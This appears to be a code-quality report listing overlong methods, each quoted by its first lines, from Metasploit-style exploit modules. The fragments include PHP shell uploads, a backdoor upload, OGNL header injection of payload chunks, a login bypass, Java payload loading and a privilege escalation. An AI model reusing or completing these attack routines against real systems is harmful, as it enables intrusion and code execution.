Showing 15,730 of 21,757 total issues
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
print_status("Checking injection...")
if check == Exploit::CheckCode::Vulnerable
Method upload_php?
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def upload_php?(login_token, shell_filename)
vprint_status("Uploading PHP file #{shell_filename}")
vars_form_data =
[
{
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
@proto = (ssl ? 'https' : 'http')
if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
uri = normalize_uri(target_uri.path)
payload_name = "#{rand_text_alpha(5)}.php"
print_status("Trying to upload #{payload_name} to mma.php Backdoor")
Method ognl_append_file
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def ognl_append_file(payload_file, payload_chunk)
data_header = datastore['HEADER'] + 'd'
file_header = datastore['HEADER'] + 'f'
headers = {
"#{data_header}": payload_chunk,
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
session_id = login_bypass
fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id
print_good('Login bypass successful')
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
print_status("Checking if the wp-config.php file already exists...")
tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
response = send_request_cgi({ 'uri' => tpath_wp_config }, timeout = datastore['TIMEOUT'])
Method create_function?
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def create_function?(language, func_name)
load_func = ''
case language
when 'perl'
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
Method execute_command
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def execute_command(cmd, opts = {})
target = select_target
case target['Platform']
when 'linux'
cmd = Rex::Text.to_hex(cmd, '')
Method initialize
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
# New installations use a randomly generated suffix like "lyris629dAe536F"
pass = nil
Method authenticate
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def authenticate(username, password)
res = send_request_cgi(
'uri' => '/admin_loginok.html',
'method' => 'POST',
'vars_post' => {
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
Method get_directories
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def get_directories(payload_filepath, targetedDirectories)
directoryNames = []
findFileDataSize = 592
maxPath = client.railgun.const('MAX_PATH')
fileNamePadding = 44
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
page = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
dbl = Rex::MIME::Message.new
Method trigger_urlclassloader
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def trigger_urlclassloader
# Here we construct a XSLT transform to load a Java payload via URLClassLoader.
url = get_uri
vars = Rex::RandomIdentifier::Generator.new({ language: :java })
Method fingerprint
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def fingerprint
res = download_log(rand_text_alphanumeric(12) + '.txt')
return if not res